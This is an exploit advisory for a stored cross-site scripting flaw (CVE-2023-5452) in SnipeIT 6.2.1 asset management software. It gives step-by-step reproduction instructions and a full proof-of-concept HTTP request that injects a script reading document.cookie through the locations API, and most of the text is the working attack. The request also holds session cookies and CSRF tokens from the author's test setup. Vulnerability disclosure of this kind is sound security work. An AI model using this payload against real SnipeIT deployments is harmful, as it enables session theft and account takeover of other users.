SnipeIT 6.2.1 Cross Site Scripting

`Exploit Title: SnipeIT 6.2.1 - Stored Cross Site Scripting  
Date: 06-Oct-2023  
Exploit Author: Shahzaib Ali Khan  
Vendor Homepage: https://snipeitapp.com  
Software Link: https://github.com/snipe/snipe-it/releases/tag/v6.2.1  
Version: 6.2.1  
Tested on: Windows 11 22H2 and Ubuntu 20.04  
CVE: CVE-2023-5452  
  
Description: SnipeIT 6.2.1 is affected by a stored cross-site scripting  
(XSS) feature that allows attackers to execute JavaScript commands. The  
location endpoint was vulnerable.  
  
Steps to Reproduce:  
  
1. Login as a standard user [non-admin] > Asset page > List All  
2. Click to open any asset > Edit Asset  
3. Create new location and add the payload:  
<script>alert(document.cookie)</script>  
4. Now login to any other non-admin or admin > Asset page > List All  
5. Open the same asset of which you can change the location and the payload  
will get executed.  
  
POC Request:  
  
POST /api/v1/locations HTTP/1.1  
Host: localhost  
Content-Length: 118  
Accept: */*  
X-CSRF-TOKEN: CDJkvGNWzFKFueeNx0AQMJIhhXJGZmKG1SFeVEGV  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: http://localhost  
Referer: http://localhost/hardware/196/edit  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Cookie: snipeit_session=AHw3ARN6pdg90xU4ovG1FBZywycKPLIxjTUfmELO;  
assetsListingTable.bs.table.cardView=false; laravel_token=  
eyJpdiI6IitpM1RXVEVEVGNLZzRTd28wYmhZblE9PSIsInZhbHVlIjoickJocmNYTzNOS3JYdkdhSmpJME1GRmJYMi9DUnVkaStDTzBnbHZDVG1xNVAvbTA5cjJHM1FTbi95SEVzNmNnNzdKNHY5em5pK3  
ZjQ2F3VnB6RnhJRCs4NkV6NW16RnRWb3M0cXBuT2ZpZExoQ3JrN1VIVHB3cWV5NUtBRWZ4OXBsdEx4R0hSeElLV1BEbWk2WGxiWEBOMDg5cGFySj1rSnENckx3bXg2Qi9KQzFvNGJJTktjTVUw0EI4YVNM  
d2UxdW1TelBDV1ByUk9yeTFOUDR1cS9SV2tFRi9LOG1iZGVweUxJdGhHTXRLSnFvTU82QVIvREphS215bkRtKzM5M1RVQ21nVENsT1M1Mn1FUT1TbFkOVDVPbHd4a3BFQW1YQkY3NFR2bzRQSGZIelppa0  
01MGYvSmFrbXVGWHpV0FMiLCJtYWMi0iJjZjMwMmQ4ZTB1NmM4MDU5YzU4MTYzZTgxNTcx0WEwYmM2Y2EyMmRlYzZhMmE2ZjI1NzIxYjc4NmIxNjRiOWM5IiwidGFnIjoiIn0%3D;  
XSRF-TOKEN=  
eyJpdiI6IjNmMVpNUEpDNCtpV0pHKOczZDRSUmc9PSIsInZhbHVlIjoiWXYvZkY2bTk4MONsUUFZQjZiVWtPdm1JRE1WWmpBd2tsZWNJblgxZWg3dONYL2x0Zkxib3N5Y1N5YmRYVm1XUm91N3pES1F1bH  
FWMEV1Y2xsZ1VqZ1FYdmdYcjJRZXZMZG9NYmpWY2htL2tPdXNBQUdEbjVHSEVjV2tzKOpYelEiLCJtYWMi0iI1YzhkNmQ2NDAxNmZkYTQ1NzVhZmI5OGY3ODA3MDkOOTc4ZWVhYmMiZWIYMjZhZGZiZWI5  
MjMOMGJjZDBkNzU4IiwidGFnIjoiIn0%3D  
Connection: close  
  
name=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&city=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&country=  
  
  
  
Thanks,  
Shahzaib Ali Khan  
`